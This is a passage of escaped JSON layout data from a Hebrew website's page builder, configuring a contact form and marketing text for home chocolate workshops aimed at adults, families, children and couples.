\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"100\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"field_type\":\"email\",\"field_label\":\"\\u05d0\\u05d9\\u05de\\u05d9\\u05d9\\u05dc - \\u05dc\\u05d0 \\u05d7\\u05d5\\u05d1\\u05d4\",\"placeholder\":\"\\u05d0\\u05d9\\u05de\\u05d9\\u05d9\\u05dc - \\u05dc\\u05d0 \\u05d7\\u05d5\\u05d1\\u05d4\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\",\"custom_id\":\"field_1\",\"_id\":\"873d3c7\"}],\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da 